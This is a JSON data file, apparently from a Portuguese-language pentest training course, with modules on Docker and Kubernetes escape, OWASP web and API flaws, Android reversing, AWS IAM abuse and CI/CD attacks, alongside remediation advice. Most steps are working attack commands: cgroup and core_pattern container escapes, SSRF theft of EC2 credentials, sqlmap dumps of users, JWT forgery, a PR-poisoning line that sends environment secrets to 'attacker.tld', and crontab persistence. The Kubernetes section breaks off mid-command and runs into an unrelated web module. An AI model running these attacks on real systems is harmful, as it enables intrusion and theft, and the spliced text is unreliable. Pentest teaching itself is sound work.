≥ 5.8 + Docker ≥ 20.10 usam cgroup v2 por padrão, onde release_agent foi removido. Em cgroup v2, preferir: mount direto de /dev/sda1, abuso de /proc/sys/kernel/core_pattern, ou CAP_SYS_ADMIN com unshare."},{"tool":"shell no container privileged (cgroup v1)","command":"mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp\nmkdir /tmp/cgrp/x\necho 1 > /tmp/cgrp/x/notify_on_release\nhost_path=$(sed -n \"s/.*\\perdir=\$[^,]*\$.*/\\1/p\" /etc/mtab)\necho \"$host_path/cmd\" > /tmp/cgrp/release_agent\necho \"#!/bin/sh\nps aux > $host_path/output\" > /cmd\nchmod +x /cmd\nsh -c \"echo \\$\\$ > /tmp/cgrp/x/cgroup.procs\"","expected":"Arquivo /output no host com ps aux do host (executou como root no host)."},{"tool":"alternativa cgroup v2 — core_pattern","command":"# Em cgroup v2 com CAP_SYS_ADMIN (ou privileged), /proc/sys/kernel/core_pattern é writable:\necho \"|/tmp/escape.sh\" > /proc/sys/kernel/core_pattern\n# Qualquer crash no host executa /tmp/escape.sh como root","notes":"Requer /proc montado com rw (default em privileged)."}]},{"id":"runc","kind":"exploit","title":"4. Runtime escapes — CVE-2019-5736 + CVE-2024-21626 (Leaky Vessels)","goal":"Explorar vulnerabilidades clássicas e recentes do runC para escape.","commands":[{"tool":"CVE-2019-5736 (hosts legados, runC < 1.0-rc7)","command":"# https://github.com/Frichetten/CVE-2019-5736-PoC\n# Sobrescreve o runC do host via /proc/self/exe no próximo docker exec.","notes":"Requer host MUITO desatualizado (patchado em 2019). Apareceu em muitos pentests de enterprise lento."},{"tool":"CVE-2024-21626 (Leaky Vessels, runC ≤ 1.1.11)","command":"# Exploit via WORKDIR malicioso apontando para /proc/self/fd/ no Dockerfile,\n# vazando fd do host em containers legítimos que compartilham a imagem.\nFROM alpine\nWORKDIR /proc/self/fd/7 # fd herdado do runC aponta para root do host","notes":"Exploitable em supply chain (imagens públicas maliciosas) e em runC ≤ 1.1.11, BuildKit ≤ 0.12.4, containerd ≤ 1.6.27 / 1.7.12."}],"evidence":["Output amicontained","Comando rodado no host com hostname diferente do container","Arquivo /tmp/teste criado pelo container, visível no host"]}],"report":[{"finding":"/var/run/docker.sock montado em containers de aplicação","severity":"critica","description":"O serviço web monta o socket Docker para \"obter informações de healthcheck\", concedendo acesso root ao host.","impact":"RCE em qualquer container = root no host = comprometimento de todos os containers.","remediation":["NUNCA montar docker.sock em containers de aplicação","Usar cAdvisor ou Docker API REST com autenticação para healthchecks","Para necessidade real, usar docker-socket-proxy com whitelist de endpoints"]},{"finding":"Containers em produção com privileged: true","severity":"critica","description":"5 containers em produção rodam com flag privileged, equivalente a root no host.","impact":"Escape trivial via cgroup ou /dev/sda1 mount.","remediation":["Remover privileged; usar capabilities específicas (cap_add)","Habilitar seccomp default profile","Adotar AppArmor/SELinux profiles","Usar gVisor ou Kata Containers para isolation extra"]},{"finding":"Imagens rodando como root","severity":"media","description":"78% dos containers rodam UID 0 internamente, mesmo sem necessidade.","impact":"Reduz superfície de defesa contra escape e vulnerabilidades de kernel.","remediation":["Adicionar USER 1000 nos Dockerfiles","Habilitar user namespaces no Docker daemon","Auditar com Trivy/Grype no pipeline CI"]}],"legalNote":"Container escape em produção pode causar interrupção de outros serviços co-located. Coordene janela e tenha rollback (snapshot do host)."},{"id":"kubernetes","groupId":"servidores","title":"Kubernetes — Pod Escape, RBAC Abuse e Cluster Takeover","shortTitle":"Kubernetes","summary":"Comprometimento de cluster Kubernetes: enumeração via SSRF na metadata API, abuso de ServiceAccount tokens, RBAC misconfig e escape para o nó worker.","difficulty":"avancado","duration":"5-7h","objectives":["Enumerar cluster a partir de pod comprometido","Abusar de ServiceAccount com permissões excessivas","Listar/criar pods em outros namespaces","Escapar pod para o nó (hostPath / hostPID)","Atingir cluster-admin"],"prerequisites":["RCE em pod via webapp","kubectl / curl no pod"],"toolset":["kubectl","kube-hunter","peirates","kubeletctl","kubeaudit","rakkess"],"mitre":[{"tactic":"Discovery","technique":"Cloud Service Discovery","id":"T1526"},{"tactic":"Privilege Escalation","technique":"Escape to Host","id":"T1611"},{"tactic":"Credential Access","technique":"Steal Application Access Token","id":"T1528"}],"steps":[{"id":"enum","kind":"enum","title":"1. Enumeração inicial dentro do pod","goal":"Coletar token, CA cert e endpoint do API server.","commands":[{"tool":"shell no pod","command":"TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)\nCACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt\nAPI=https://kubernetes.default.svc\ncurl -s --cacert $CACERT -H \"Authorization: Bearer $TOKEN\" $API/api/v1/namespaces/default/pods | jq ."},{"tool":"rakkess (auth check)","command":"rakkess --sa default:default --kubeconfig /tmp/kc","expected":"Lista de verbs/resources permitidos para a ServiceAccount."}]},{"id":"rbac","kind":"privesc","title":"2. Abuso de RBAC — criar pod com hostPath","goal":"Se a SA pode criar pods, montar / do host e ler kubelet credentials.","commands":[{"tool":"kubectl (com token)","command":"kubectl --token=$TOKEN --certificate-authority=$CACERT --server=$API get pods -A"},{"tool":"pod malicioso (escape)","command":"cat <\"}'"}]},{"id":"ssrf","kind":"exploit","title":"5. A05/A10 — SSRF para metadata cloud","goal":"Abusar de fetch de URL para acessar IMDS.","commands":[{"tool":"burp / curl","command":"curl -X POST \"https://alvo/api/import?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/\"","expected":"Roles disponíveis na instância EC2."}]},{"id":"jwt","kind":"privesc","title":"6. A07 — JWT alg:none / weak secret","goal":"Forjar token de admin.","commands":[{"tool":"jwt_tool","command":"jwt_tool $TOKEN -X a # alg:none\njwt_tool $TOKEN -C -d rockyou.txt # crack HS256 secret\njwt_tool $TOKEN -T # tamper claims (role:admin)"}],"evidence":["Lista de URLs descobertas","PoCs dos achados (curl reproduzível)","Screenshots das respostas vulneráveis","CSV resumindo OWASP categoria × endpoint × severidade"]}],"report":[{"finding":"A01 — IDOR em /api/orders permite acesso a pedidos alheios","severity":"alta","cvss":"7.7 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)","description":"O endpoint não valida se o user.id da sessão é dono do order solicitado.","impact":"Vazamento de dados pessoais e financeiros de todos os clientes.","remediation":["Validar ownership: SELECT * FROM orders WHERE id=? AND user_id=?","Usar UUIDs em vez de IDs sequenciais","Adotar autorização declarativa (Casbin, Cerbos, OPA)"]},{"finding":"A03 — SQL Injection no parâmetro q de /search","severity":"critica","cvss":"9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)","description":"Concatenação direta de string em query SQL, sem prepared statements.","impact":"Dump completo do banco; possível RCE via UDF em MySQL.","remediation":["Migrar para prepared statements / ORM com binding","Aplicar WAF (ModSecurity CRS, Cloudflare)","Princípio do menor privilégio na conta de banco da aplicação"]},{"finding":"A07 — JWT assinado com HS256 e segredo fraco","severity":"critica","description":"Token usa segredo \"secret123\", quebrável offline em segundos.","impact":"Forjar tokens com qualquer claim (role:admin), takeover total.","remediation":["Migrar para RS256/EdDSA com chaves rotacionadas","Validar header alg explicitamente (rejeitar none e mismatch)","Usar JWKS endpoint com kid"]}],"legalNote":"Pentest web pode causar inserções/deleções acidentais. Use base de dados de pré-produção quando possível e avise time de DevOps antes de testes destrutivos.","liveSimulation":{"attackerLabel":"Atacante — Burp Suite Pro","targetLabel":"Aplicação — alvo.com.br","attackerPrompt":"burp@kali","targetPrompt":"webapp","actions":[{"side":"attacker","kind":"cmd","text":"feroxbuster -u https://alvo.com.br -w raft-medium-words.txt -x php,bak -t 50","delayMs":800,"explanation":{"title":"Content discovery","body":"O atacante enumera caminhos ocultos da aplicação: /admin, /backup, /api/v1, /.git/. O passo mais básico do OWASP Testing Guide.","mitre":"T1595.003"}},{"side":"target","kind":"log","text":"nginx: 12,847 requests in 47s from 203.0.113.42 (rate: 273 req/s)","delayMs":900,"explanation":{"title":"App recebe rajada","body":"Sem rate limit na borda, 273 req/s passam direto. O WAF poderia detectar pelo User-Agent (\"feroxbuster/...\") mas o atacante pode falsificar.","mitre":"T1499.001"}},{"side":"attacker","kind":"output","text":"[200] /api/v1/orders/12345\n[200] /api/v1/orders/12346\n[200] /api/v1/orders/12347","delayMs":1100,"explanation":{"title":"Endpoint de orders descoberto","body":"IDs sequenciais respondendo 200. Sinal clássico de IDOR — o atacante vai testar se pode ler orders de outros usuários."}},{"side":"attacker","kind":"cmd","text":"curl -H \"Authorization: Bearer $MY_TOKEN\" https://alvo.com.br/api/v1/orders/12346","delayMs":1200,"explanation":{"title":"A01: Broken Access Control","body":"Atacante autenticado como user-A tenta acessar order de outro usuário. O backend deveria validar owner = current_user. Spoiler: não valida.","mitre":"T1190"}},{"side":"target","kind":"event","text":"SELECT * FROM orders WHERE id = 12346 (missing WHERE user_id = ?)","delayMs":700,"explanation":{"title":"Query vulnerável","body":"A query lê order pelo id mas não valida ownership. Bug clássico, aparece em ~40% dos pentests web.","mitre":"T1190"}},{"side":"attacker","kind":"alert","text":"IDOR CONFIRMED: got order of user B (id 12346) authenticated as user A","delayMs":600,"explanation":{"title":"Vulnerabilidade #1 confirmada","body":"Com um script, o atacante pode baixar TODAS as orders de TODOS os clientes (vazamento massivo de dados + PII)."}},{"side":"attacker","kind":"cmd","text":"sqlmap -u \"https://alvo.com.br/search?q=test\" --batch --risk=2 --level=3 --dbs","delayMs":1000,"explanation":{"title":"A03: Injection — SQLi via search","body":"O sqlmap tenta dezenas de payloads (union, time-based, error-based) para detectar se o parâmetro q é concatenado direto na query SQL.","mitre":"T1190"}},{"side":"target","kind":"log","text":"MySQL: ERROR 1064 (42000): You have an error in your SQL syntax near '\\''test\\''' at line 1","delayMs":900,"explanation":{"title":"Erro SQL vazado","body":"A aplicação retorna o erro do MySQL na resposta HTTP. Confirmação de SQLi + leak de estrutura de query. Debug deveria estar off em produção.","mitre":"T1190"}},{"side":"attacker","kind":"output","text":"[sqlmap] Parameter q is vulnerable. 3 databases: information_schema, alvo_prod, alvo_logs","delayMs":700,"explanation":{"title":"SQLi exploitável","body":"Tempo total do sqlmap: ~30 segundos. Agora o atacante pode listar tabelas, colunas, e extrair dados."}},{"side":"attacker","kind":"cmd","text":"sqlmap -u \"…/search?q=test\" -D alvo_prod -T users -C email,password_hash --dump --where \"id<5\"","delayMs":1400,"explanation":{"title":"Extração controlada","body":"Atacante responsável limita a extração (só 5 linhas) pra provar impacto sem causar dano massivo. O relatório vai ter evidência suficiente.","mitre":"T1190"}},{"side":"target","kind":"alert","text":"[WAF] High volume of SQL-like patterns from 203.0.113.42 — scored 8.2 (>threshold 7.0)","delayMs":800,"explanation":{"title":"WAF detecta (tarde)","body":"ModSecurity CRS detecta o padrão depois de ~60 requests. Default é \"alert\" (não \"block\"). Precisa estar em paranoia 2+ com block enabled.","mitre":"M1048"}},{"side":"attacker","kind":"cmd","text":"curl -X POST alvo.com.br/api/import -d '{\"url\":\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\"}'","delayMs":1200,"explanation":{"title":"A10: SSRF → IMDS da EC2","body":"O endpoint /import aceita uma URL externa e busca o conteúdo. Atacante aponta para metadata da EC2 — que ainda aceita IMDSv1.","mitre":"T1212"}},{"side":"target","kind":"event","text":"IMDSv1 response: {\"RoleArn\":\"arn:aws:iam::123456:role/webapp\",\"AccessKeyId\":\"ASIA…\",\"SecretAccessKey\":\"…\",\"Token\":\"…\"}","delayMs":900,"explanation":{"title":"Credenciais AWS vazam","body":"IMDSv1 responde sem token. A role \"webapp\" tem credenciais temporárias válidas. Atacante pode usar essas credenciais em qualquer API AWS.","mitre":"T1552.005"}},{"side":"attacker","kind":"alert","text":"STOLEN: AWS STS credentials (6h validity). Role: webapp → S3 read/write, Lambda invoke","delayMs":700,"explanation":{"title":"Pivot para AWS","body":"A role da aplicação tem mais permissão do que devia (least privilege não aplicado). Atacante agora pode exfiltrar buckets e executar Lambdas.","mitre":"T1078.004"}},{"side":"attacker","kind":"cmd","text":"aws s3 ls s3://alvo-backups/ --profile stolen → download all","delayMs":1000,"explanation":{"title":"Exfiltração de backups","body":"Com as credenciais, o bucket de backups é acessível. Dumps SQL, configs, logs — tudo offline em segundos.","mitre":"T1530"}},{"side":"target","kind":"log","text":"CloudTrail: s3:GetObject × 47,000 from IP 203.0.113.42 (bucket: alvo-backups)","delayMs":900,"explanation":{"title":"CloudTrail registra (sem alerta)","body":"A telemetria existe mas não gera alerta — ninguém configurou GuardDuty com regras de exfiltração ou CloudWatch Alarm em volume anômalo.","mitre":"T1562.001"}},{"side":"attacker","kind":"event","text":"FIM. 3 bugs explorados em cadeia: IDOR + SQLi + SSRF → AWS takeover","delayMs":1200,"explanation":{"title":"Kill chain web","body":"Defesas: validar ownership em cada query, prepared statements obrigatórios, IMDSv2 forçado, WAF em block (não alert), role AWS com least privilege, GuardDuty habilitado.","mitre":"M1047"}}]}},{"id":"api-rest","groupId":"apps","title":"API REST — OWASP API Top 10 (2023)","shortTitle":"API REST","summary":"Pentest de API REST/GraphQL aplicando OWASP API Top 10 2023: BOLA, broken authentication, mass assignment, rate limit, SSRF, e GraphQL introspection.","difficulty":"intermediario","duration":"2-3 dias","objectives":["Mapear endpoints via Swagger/Postman/Burp","Testar BOLA (Broken Object Level Authorization)","Identificar mass assignment","Avaliar rate limiting e abuso de recursos","Explorar introspection em GraphQL"],"prerequisites":["Spec OpenAPI/Swagger ou coleção Postman","2 contas para testes de autorização horizontal/vertical"],"toolset":["burp suite","postman","kiterunner (kr)","graphql-cop","jwt_tool","mitmproxy","arjun"],"mitre":[{"tactic":"Initial Access","technique":"Exploit Public-Facing Application","id":"T1190"},{"tactic":"Credential Access","technique":"Credentials from Password Stores","id":"T1555"}],"steps":[{"id":"spec","kind":"recon","title":"1. Descoberta de endpoints","goal":"Carregar spec ou descobrir rotas por brute force.","commands":[{"tool":"kiterunner","command":"kr scan https://api.alvo.com -w /opt/routes-large.kite -A=apiroutes-220828","expected":"Lista endpoints + métodos HTTP + status."},{"tool":"arjun (parameters)","command":"arjun -u \"https://api.alvo.com/users/me\" -m GET"}]},{"id":"bola","kind":"exploit","title":"2. API1:2023 — BOLA","goal":"Acessar recurso de outro tenant trocando o ID.","commands":[{"tool":"curl","command":"curl -H \"Authorization: Bearer $TKN_A\" https://api.alvo.com/v1/invoices/inv_12345 # próprio\ncurl -H \"Authorization: Bearer $TKN_A\" https://api.alvo.com/v1/invoices/inv_12346 # do tenant B"}],"decision":{"question":"A API usa UUIDs (não enumerable). BOLA está mitigado?","options":[{"id":"nao","label":"Não — testar via referer/leak/log","consequence":"UUIDs reduzem mas não eliminam BOLA. Verifique se IDs aparecem em logs públicos, search, ou em respostas de outros endpoints.","recommended":true},{"id":"sim","label":"Sim — pular para próximo teste","consequence":"Falsa confiança. UUIDs não substituem checagem de ownership."}]}},{"id":"massassign","kind":"exploit","title":"3. API6:2023 — Mass Assignment","goal":"Setar campo \"role\":\"admin\" em request de update.","commands":[{"tool":"curl","command":"curl -X PUT -H \"Authorization: Bearer $TKN\" -H \"Content-Type: application/json\" \\\n https://api.alvo.com/v1/users/me \\\n -d '{\"name\":\"x\",\"role\":\"admin\",\"is_verified\":true}'","expected":"Resposta 200 com role:\"admin\" — escalada para admin global."}]},{"id":"rate","kind":"exploit","title":"4. API4:2023 — Unrestricted Resource Consumption","goal":"Validar rate limit em endpoint custoso.","commands":[{"tool":"wrk","command":"wrk -t10 -c100 -d30s -H \"Authorization: Bearer $TKN\" https://api.alvo.com/v1/reports/heavy","expected":"Tempo de resposta degrada > 30s; sem rate limit visível."}]},{"id":"graphql","kind":"exploit","title":"5. GraphQL — Introspection + IDOR","goal":"Extrair schema e abusar de queries não esperadas.","commands":[{"tool":"graphql-cop","command":"python3 graphql-cop.py -t https://api.alvo.com/graphql --header \"Authorization: Bearer $TKN\""},{"tool":"curl (introspection)","command":"curl -X POST https://api.alvo.com/graphql -H \"Content-Type: application/json\" -d '{\"query\":\"{__schema{types{name}}}\"}'"}],"evidence":["Coleção Postman com requests vulneráveis","CSV: endpoint × OWASP API ID × severidade","Diff de payload mostrando campo \"role\" aceito"]}],"report":[{"finding":"API1:2023 — BOLA em /v1/invoices/{id}","severity":"critica","description":"Servidor retorna invoice de qualquer tenant_id se o ID for conhecido. UUIDs vazam em logs e em /v1/audit-events.","impact":"Vazamento de dados financeiros de todos os clientes.","remediation":["Validar tenant_id da sessão contra invoice.tenant_id em cada request","Adotar middleware de tenant scoping (Postgres RLS, MultiTenancy do ORM)","Não logar IDs sensíveis em endpoints públicos"]},{"finding":"API6:2023 — Mass assignment em PUT /v1/users/me","severity":"critica","description":"Endpoint aceita campos arbitrários do body sem allowlist (role, is_verified, plan).","impact":"Privilege escalation horizontal e vertical trivial.","remediation":["Whitelist explícita de campos editáveis (DTO)","Separar endpoints administrativos com autorização forte","Rejeitar campos desconhecidos (additionalProperties: false em JSON Schema)"]},{"finding":"GraphQL com introspection habilitada em produção + sem depth limit","severity":"alta","description":"Schema completo exposto via __schema; queries com nested fragments causam DoS por explosão exponencial.","impact":"Atacante mapeia toda a API e pode causar negação de serviço.","remediation":["Desabilitar introspection em produção","Aplicar query depth limit e cost analysis (graphql-shield, GraphQL Armor)","Habilitar persisted queries em clients públicos"]}],"legalNote":"Testes de rate limit e mass assignment podem alterar dados. Use ambiente staging com snapshot."},{"id":"mobile-android","groupId":"apps","title":"Mobile Android — APK Reversing, MASVS e SSL Pinning Bypass","shortTitle":"Mobile Android","summary":"Pentest completo de aplicativo Android: análise estática (APK reversing), dinâmica (Frida hooks, bypass de SSL pinning) e MASVS L1/L2.","difficulty":"intermediario","duration":"3-5 dias","objectives":["Analisar APK estaticamente (jadx, mobsf)","Identificar segredos hardcoded","Bypass de SSL pinning para interceptar tráfego","Hook de funções com Frida","Avaliar storage local (SQLite, SharedPreferences)"],"prerequisites":["APK do app (preferencialmente release)","Device rooted ou emulador (Android 11)"],"toolset":["jadx","mobsf","frida","objection","apktool","burp suite","adb","drozer"],"mitre":[{"tactic":"Initial Access","technique":"Phishing (Mobile)","id":"T1660"},{"tactic":"Credential Access","technique":"Input Capture: Keylogging","id":"T1417.001"},{"tactic":"Discovery","technique":"Application Discovery","id":"T1418"},{"tactic":"Collection","technique":"Access Stored Application Data","id":"T1409"}],"steps":[{"id":"estatica","kind":"enum","title":"1. Análise estática","goal":"Decompilar APK, achar segredos e endpoints.","commands":[{"tool":"jadx","command":"jadx -d out/ alvo.apk\ngrep -r \"apiKey\\|secret\\|password\" out/ | grep -i \"= \\\"\""},{"tool":"mobsf","command":"docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf\n# Upload APK pela UI; relatório completo gerado"},{"tool":"apktool","command":"apktool d alvo.apk -o smali/\n# Verificar AndroidManifest.xml: exported activities, debuggable, backupAllowed"}]},{"id":"mitm","kind":"enum","title":"2. Interceptação de tráfego","goal":"Configurar proxy e bypass de SSL pinning.","commands":[{"tool":"burp + adb","command":"adb shell settings put global http_proxy 192.168.1.100:8080\n# Instalar cert do Burp como system-trusted (root necessário)\nadb push burp.pem /data/local/tmp/\nadb shell su -c \"mount -o rw,remount /system && cp /data/local/tmp/burp.pem /system/etc/security/cacerts/.0\""},{"tool":"frida (universal pinning bypass)","command":"frida -U -l universal-android-ssl-pinning-bypass.js -f com.alvo.app --no-pause","expected":"Console mostra \"Bypassing OkHttp3\" e \"Bypassing TrustManager\"."}],"decision":{"question":"O app detecta root e fecha. Como prosseguir?","options":[{"id":"frida-bypass","label":"Hook das funções de root detection com Frida","consequence":"Reabilita análise dinâmica. Recomendado.","recommended":true},{"id":"magisk-hide","label":"Usar Magisk + DenyList","consequence":"Esconde root do app; alternativa quando Frida não basta."}]}},{"id":"storage","kind":"enum","title":"3. Storage local","goal":"Inspecionar dados sensíveis em SQLite, SharedPreferences e files.","commands":[{"tool":"adb","command":"adb shell run-as com.alvo.app ls -la databases/ shared_prefs/\nadb pull /data/data/com.alvo.app/databases/app.db .\nsqlite3 app.db \".dump\""}]},{"id":"frida-hooks","kind":"exploit","title":"4. Frida — hooks customizados","goal":"Hookar função de auth/crypto para extrair valores em runtime.","commands":[{"tool":"frida script","command":"frida -U -l hook.js com.alvo.app\n# hook.js:\n# Java.perform(()=>{ const c=Java.use(\"com.alvo.crypto.AES\"); c.encrypt.implementation=function(p){console.log(\"plain:\",p); return this.encrypt(p);} });"}],"evidence":["Diff manifest (debuggable=true em release)","Trecho jadx com API key hardcoded","PCAP burp com tráfego decifrado","Scripts Frida usados (anexar .js)"]}],"report":[{"finding":"API key do AWS hardcoded em strings.xml","severity":"critica","description":"O APK contém AKIA****** com permissões S3 ListBucket/GetObject em strings.xml.","impact":"Atacante extrai a key em < 1 minuto e acessa buckets corporativos.","remediation":["Remover credenciais do APK; usar Cognito Identity Pools ou STS via backend","Aplicar code obfuscation (R8 / ProGuard) — atrasa, não resolve","Auditar APK em CI com mobsf-cli"]},{"finding":"SSL pinning ausente / bypass trivial","severity":"alta","description":"App usa OkHttp default sem pinning; cert do Burp aceito.","impact":"MITM em redes públicas captura tokens, dados pessoais e PII.","remediation":["Implementar Certificate Pinning (OkHttp CertificatePinner)","Usar Network Security Config para pinning declarativo","Adotar attestation via Play Integrity API"]},{"finding":"android:debuggable=\"true\" em build de produção","severity":"alta","description":"Manifesto permite debug e backup completo via adb.","impact":"Qualquer device com adb pode debugar o app e ler memória.","remediation":["Setar debuggable=false e allowBackup=false no manifest","Validar via gradle build variants (release sempre)"]}],"legalNote":"Reverter APKs de terceiros pode violar EULA. Faça apenas em apps com autorização do dono."},{"id":"aws","groupId":"cloud","title":"AWS — IAM Privilege Escalation, SSRF para IMDS e S3 Public","shortTitle":"AWS IAM/SSRF","summary":"Comprometimento de ambiente AWS via SSRF na aplicação web (acesso ao IMDSv1), abuso de permissões IAM e exfiltração de buckets S3 mal-configurados.","difficulty":"avancado","duration":"4-6h","objectives":["Explorar SSRF para acessar metadata da EC2","Enumerar IAM via Pacu / aws-cli","Identificar caminhos de privesc (iam:PassRole, sts:AssumeRole)","Encontrar buckets S3 públicos / com ACL incorreta"],"prerequisites":["Aplicação web vulnerável a SSRF","CLI aws + jq + Pacu"],"toolset":["aws-cli","pacu","enumerate-iam","s3scanner","cloudsplaining","prowler"],"mitre":[{"tactic":"Initial Access","technique":"Exploit Public-Facing Application","id":"T1190"},{"tactic":"Privilege Escalation","technique":"Cloud Accounts","id":"T1078.004"},{"tactic":"Exfiltration","technique":"Transfer Data to Cloud Account","id":"T1537"}],"steps":[{"id":"ssrf","kind":"exploit","title":"1. SSRF → IMDSv1 → credenciais","goal":"Capturar AccessKey/SecretKey/Token da role da EC2.","commands":[{"tool":"curl via SSRF","command":"curl \"https://alvo/import?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/\"\n# Lista roles\ncurl \"https://alvo/import?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/web-app-role\"","expected":"JSON com AccessKeyId, SecretAccessKey, Token, Expiration."}],"decision":{"question":"IMDSv1 está respondendo. Como evitar exposição em produção?","options":[{"id":"imdsv2","label":"Forçar IMDSv2 (HttpTokens=required)","consequence":"Bloqueia SSRF clássico (exige PUT + token). Recomendado.","recommended":true},{"id":"firewall","label":"Bloquear 169.254.169.254 no nível da app","consequence":"Mitigação parcial; pode ser contornada via DNS rebinding."}]}},{"id":"enum-iam","kind":"enum","title":"2. Enumeração IAM","goal":"Mapear permissões da role comprometida.","commands":[{"tool":"aws-cli","command":"export AWS_ACCESS_KEY_ID=...\nexport AWS_SECRET_ACCESS_KEY=...\nexport AWS_SESSION_TOKEN=...\naws sts get-caller-identity\naws iam list-attached-role-policies --role-name web-app-role"},{"tool":"enumerate-iam","command":"python3 enumerate-iam.py --access-key $A --secret-key $S --session-token $T","expected":"Lista de actions permitidas (brute force de chamadas read-only)."}]},{"id":"privesc","kind":"privesc","title":"3. Privesc via iam:PassRole + lambda:CreateFunction","goal":"Criar Lambda que assume role mais privilegiada.","commands":[{"tool":"pacu","command":"pacu\nset_keys --key-name webapp\nrun iam__enum_permissions\nrun iam__privesc_scan\nrun lambda__create_attach_iam_role"},{"tool":"manual","command":"zip function.zip index.py\naws lambda create-function --function-name privesc \\\n --runtime python3.11 --role arn:aws:iam::123:role/AdminRole \\\n --handler index.handler --zip-file fileb://function.zip\naws lambda invoke --function-name privesc out.json"}]},{"id":"s3","kind":"exfil","title":"4. S3 — buckets públicos e ACL","goal":"Listar buckets, identificar leituras públicas e exfiltrar dados.","commands":[{"tool":"aws s3","command":"aws s3 ls\naws s3api get-bucket-policy --bucket alvo-backups\naws s3api get-bucket-acl --bucket alvo-backups"},{"tool":"s3scanner","command":"python3 s3scanner.py scan --bucket-file buckets.txt"}],"evidence":["JSON do IMDS com creds (anonimizar no relatório)","Output enumerate-iam","Diff de policy mostrando privesc","Lista de objetos S3 acessíveis publicamente"]}],"report":[{"finding":"IMDSv1 habilitado em instâncias EC2 expostas","severity":"critica","cvss":"9.1","description":"24 instâncias EC2 com IMDSv1 ativo. SSRF na aplicação web web-prod retornou credenciais válidas da role.","impact":"SSRF → comprometimento de credenciais → privesc → cluster admin AWS.","remediation":["Forçar IMDSv2 em todas as instâncias: aws ec2 modify-instance-metadata-options --http-tokens required --http-endpoint enabled","Aplicar SCP impedindo criação de instância sem IMDSv2","Configurar hop limit = 1 para impedir propagação por containers"]},{"finding":"Role com iam:PassRole + lambda:CreateFunction (privesc trivial)","severity":"critica","description":"A role web-app-role tem permissão para passar AdminRole para serviços.","impact":"Qualquer comprometimento da role escala para Admin via Lambda.","remediation":["Restringir iam:PassRole com Condition (iam:PassedToService) e ResourceArn específico","Adotar permission boundaries em todas as roles","Auditar com cloudsplaining e Access Analyzer"]},{"finding":"Bucket S3 alvo-backups com ListBucket público","severity":"alta","description":"Block Public Access desabilitado; bucket policy permite s3:ListBucket para Principal \"*\".","impact":"Listagem permite enumeração de objetos (alguns com URLs assinadas vazadas).","remediation":["Habilitar Account-level Block Public Access","Auditar via Access Analyzer e Trusted Advisor","Habilitar Object Ownership: BucketOwnerEnforced (desabilita ACLs)"]}],"legalNote":"Mesmo em pentest autorizado, evite operações que aumentem custo do cliente (criar EC2, Lambda invocada milhares de vezes). Sempre limpar recursos criados (terraform destroy / aws cleanup)."},{"id":"cicd","groupId":"cloud","title":"CI/CD Pipeline — GitHub Actions, GitLab CI e Supply Chain","shortTitle":"CI/CD Pipeline","summary":"Comprometimento de pipelines CI/CD via Pull Request poisoning, secrets vazados em logs, runners self-hosted compartilhados e dependency confusion.","difficulty":"avancado","duration":"3-5h","objectives":["Mapear workflows e triggers (pull_request_target, workflow_run)","Identificar secrets expostos / overly broad scope","Demonstrar PR poisoning em workflow vulnerável","Avaliar runner self-hosted (escape e persistência)"],"prerequisites":["Acesso de leitura a repositório alvo","Conta GitHub para abrir PR"],"toolset":["gh CLI","gitleaks","tfsec","checkov","pipeline-grappler","octoscan","gato (GitHub Attack Toolkit)"],"mitre":[{"tactic":"Initial Access","technique":"Supply Chain Compromise","id":"T1195"},{"tactic":"Credential Access","technique":"Steal Application Access Token","id":"T1528"},{"tactic":"Persistence","technique":"Modify Authentication Process","id":"T1556"}],"steps":[{"id":"recon","kind":"recon","title":"1. Reconhecimento de workflows","goal":"Listar workflows, secrets e gatilhos vulneráveis.","commands":[{"tool":"gato","command":"gato enumerate -t alvo-org/alvo-repo\ngato enumerate -t alvo-org -O alvo-org","expected":"Workflows, runners self-hosted, contributors com permissão write."},{"tool":"octoscan","command":"octoscan scan --repo alvo-org/alvo-repo"}]},{"id":"pr-poison","kind":"exploit","title":"2. pull_request_target poisoning","goal":"Abrir PR que executa código no runner com acesso a secrets.","commands":[{"tool":"PoC workflow","command":"# Repositório alvo tem .github/workflows/test.yml com:\n# on: pull_request_target\n# jobs:\n# test:\n# steps:\n# - uses: actions/checkout@v4\n# with: { ref: \\${{ github.event.pull_request.head.sha }} }\n# - run: npm test # ← roda código DO PR com secrets do repo!\n\n# 1. Fork do repo, modificar package.json:\n# \"scripts\": {\"test\":\"curl -X POST attacker.tld -d $(env | base64)\"}\n# 2. Abrir PR via gh pr create"}],"decision":{"question":"O workflow é pull_request (não _target). Está seguro?","options":[{"id":"parcial","label":"Parcialmente — checar se baixa scripts/actions externas mutáveis","consequence":"pull_request roda sem secrets, mas dependency confusion ainda é possível.","recommended":true},{"id":"sim","label":"Sim, seguro","consequence":"Falsa segurança. Verifique reusable workflows e GITHUB_TOKEN permissions."}]}},{"id":"secrets","kind":"enum","title":"3. Secrets em logs e artifacts","goal":"Encontrar credentials vazadas em logs públicos / artifacts.","commands":[{"tool":"gh CLI","command":"gh run list --repo alvo-org/alvo-repo --limit 50\ngh run view --log | grep -i \"AKIA\\|secret\\|token\""},{"tool":"gitleaks","command":"gitleaks detect --source . --report-format json --report-path leaks.json"}]},{"id":"runner","kind":"lateral","title":"4. Runner self-hosted — persistência","goal":"Quando runner é shared e não-effemero, deixar webshell para próximo job.","commands":[{"tool":"workflow malicioso (em fork autorizado)","command":"# steps:\n# - run: |\n# cp /tmp/whoami /home/runner/.cache/persist.sh\n# chmod +x /home/runner/.cache/persist.sh\n# crontab -l 2>/dev/null; echo \"* * * * * /home/runner/.cache/persist.sh\" | crontab -"}],"evidence":["YAML do workflow vulnerável","PR de PoC com diff malicioso destacado","Log do runner mostrando exfiltração de secrets","Lista de workflows com permissions: write-all"]}],"report":[{"finding":"pull_request_target executa código não confiável com secrets","severity":"critica","description":"Workflow .github/workflows/test.yml usa pull_request_target + checkout do head.sha + npm test, expondo todos os secrets a forks.","impact":"Qualquer pessoa abre um PR e exfiltra GITHUB_TOKEN + credenciais de deploy.","remediation":["Substituir pull_request_target por pull_request (sem acesso a secrets)","Se 